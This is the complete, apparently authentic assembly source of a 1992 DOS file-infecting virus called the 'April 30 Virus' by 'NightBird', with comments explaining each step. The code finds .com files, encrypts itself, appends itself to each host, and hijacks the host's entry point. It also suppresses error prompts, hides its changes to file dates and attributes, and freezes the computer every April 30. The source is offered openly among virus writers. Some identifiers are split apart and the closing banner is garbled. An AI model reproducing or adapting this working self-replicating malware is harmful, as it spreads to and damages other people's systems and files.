2022-08-21 09:07:57 +00:00
;******************************************************************************
;* Written in *
;* April 30 Virus - Strain A A86 V3.22 *
;* ---------- *
;******************************************************************************
;* "NightBird goes, *
;* Along with the Queen..." *
;******************************************************************************
; Your are now looking at the result of my very first attempt to code
; a Virus. This virus is a non-Resident Self- encrypting Direct Action
; Com Infecter, which doesn't infect Command.com. The Virus is only active
; on April 30, showing the Message and Hanging the System.....
; You can recognize an infected File simply, the 4th Byte is a 'N'ightBird.
;
; Disclaimer: The Author will not be held responsible for any actions
; caused by this Virus.
;
; Note: Don't just say: " another booring virus.. ", instead
; be a teaching aid, and search for my pitfalls, (ofcoz
; if there are any!), so I can improve my code....
; Please do so.....
;
; Enough of that crap talk,
; Greetingz go to... : John Tardy / TridenT and all other Members..
; : Serge of (Ex) House Designs
; : All Virus-Writers around the globe
;
; Well that's it for now.....
;
; C U & Have pHun,
; (c) NightBird Dec. 1992.
org 100h ; Produce a Com File
Start: jmp Prog ;
db 'N' ; Virus ID
Prog: Push ax ; Save Possible Errors
call Main ; Get Virus
Main: pop bp ; Offset
sub bp , offset Main ; IP = BP
lea si , Restore [ bp ] ;
mov di , si ;
mov cx , CrypterLen ; Decrypt
Decrypt: lodsb ; the
Key: Add al , 0 ; Virus
stosb ;
loop Decrypt ;
Decryptlen equ $ - Prog ;
Restore: lea si ,[ bp + Restore_Host ] ; Restore
mov di , 100h ; the Original
movsw ; 4 Bytes of the
movsw ; Host Program
mov ah , 2ah ; Is it
int 21h ; the 30 of
cmp dh , 4 ; April?
jne Start_Virus ; Yes, Show Txt
cmp dl , 30 ; No, Continue
jne Start_Virus ; with Start_Virus
mov ah , 09h ;
lea dx , Txt [ bp ] ; Show Txt
int 21h ; And lock
HyperSpace: cli ; the Computer
jmp HyperSpace ;
Start_Virus: mov ax , 3524h ; Get Adress of
int 21h ; Interrupt 24h
lea Oldint24h [ bp ], es ; Store
lea Oldint24h + 2 [ bp ], bx ; them...
push cs ; Cs = Es
pop es ; Register
mov ax , 2524h ; Install a new
lea dx , Newint24h ; Int. to suppres
int 21h ; Errors..
mov ah , 1ah ; Move DTA
mov dx , dta ; to a save
int 21h ; place
mov ah , 4eh ;
Search: lea dx ,[ bp + Filespec ] ; Search
xor cx , cx ; for a com file, and
int 21h ; and quit if error
jnc Found ;
jmp End_Virus ;
Found: cmp word ptr [ bp + offset dta + 35 ], 'DN' ; Check If Command.com
je Find_Next_one ;
mov ax , 4300h ; Fetch file
mov dx , dta + 1eh ; Attribute
int 21h ; and store it
push cx ; on stack
mov ax , 4301h ; Set attribute
mov cx , cx ; for use
int 21h ;
mov ax , 3d02h ; Open file
int 21h ; Dx = 0fd1eh
xchg ax , bx ; BX = FileHandle
mov ax , 5700h ; Get file/date
int 21h ; format and
push cx ; store them
push dx ; on stack
mov ah , 3fh ; Read 4 Bytes
lea dx ,[ bp + Restore_Host ] ; and save
mov cx , 4 ; them..
int 21h
mov ax ,[ Restore_Host + bp ] ; Check
cmp ax , 'MZ' ; if it is
je Exit ; a renamed
cmp ax , 'ZM' ; Exe-File
je exit ;
mov ah ,[ bp + Restore_Host + 3 ] ; Check if Already
cmp ah , 'N' ; infected
jne Infect
; Jump to Sub-Routine
Exit: Call Cl ose
Find_Next_one: mov ah , 4fh ; Try Another
jmp Search ; file...
Infect: mov ax , 4202h ; Move File
xor cx , cx ; Pointer to
xor dx , dx ; the End of
int 21h ; the File
cmp ax , 0fb00h ; File too
jae Exit ; Big
cmp ax , Minlen ; File too
jbe Exit ; Short
sub ax , 3 ; Save Jmp
mov word ptr [ bp + Jmp_to_Virus ] + 1 , ax ;
Zero: mov ah , 2ch ; (If the key
int 21h ; is 0,go Zero)
cmp dl , 0 ;
jne Continue ; Get Seconds
jmp Zero ; to save as
Continue: mov key + 1 [ bp ], dl ; Decrypter-Key
lea si ,[ Prog + bp ] ;
mov di , 0fd00h ; Move the
mov cx , Decryptlen ; Decrypter
rep movsb ; Part
lea si , Restore [ bp ] ;
mov cx , Crypterlen ; Decrypt behind
Encrypt: lodsb ; the
Sub al , dl ; Decrypter
stosb ;
loop encrypt ;
mov ah , 40h ; Write Virus
lea dx , 0fd00h ; at the end
mov cx , virlen ; of the file!
int 21h ;
mov ax , 4200h ; Move File
xor cx , cx ; Pointer to
xor dx , dx ; the start of
int 21h ; the file
mov ah , 40h ; Write Virus-Jmp
lea dx , Jmp_to_Virus [ bp ] ; to the begin
mov cx , 4 ; of the file
int 21h ;
call cl ose ; Jump to Sub-Routine
End_Virus: mov ax , 2524h ;
lea bx , Oldint24h [ bp ] ; Restore Old
mov ds , bx ; (Critical Error)
lea dx , Oldint24h + 2 [ bp ] ; Interrupt 24h
int 21h ;
push cs ; Cs = Ds
pop ds ; Register
mov ah , 1ah ;
mov dx , 80h ;
int 21h ; Restore DTA
pop ax ; and go back
mov di , 100h ; to the Host
push di ; Program
ret ;
Close: pop si ; Fetch IP from Stack
pop dx ;
pop cx ; Restore
mov ax , 5701h ; Date/Time
int 21h ;
mov ah , 3eh ; Close
int 21h ; File
mov ax , 4301h ;
pop cx ; Restore File
mov dx , dta + 1eh ; Attributes
int 21h ;
push si ; Restores IP
ret ;
Newint24h: mov al , 3 ; Suppres Errors
iret ; & Go back
Oldint24h dd 0
Rest ore_Host db 0cdh , 20h , 0 , 0
Jmp_to_Virus db 0e9h , 0 , 0 , 'N'
Filespec db '*.com' , 0
Txt db 13 , 10 , 9 , 9 , '"NightBird goes,' , 10 , 'Along with the Queen..."' , 13 , 10 , 7 , '$'
Names db '*April 30 Virus*'
Dta equ 0fc00h
Crypterlen equ $ - Restore
Virlen equ $ - Prog
Minlen equ Virlen * 2
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> > ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <<3C> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> > ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <<3C> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
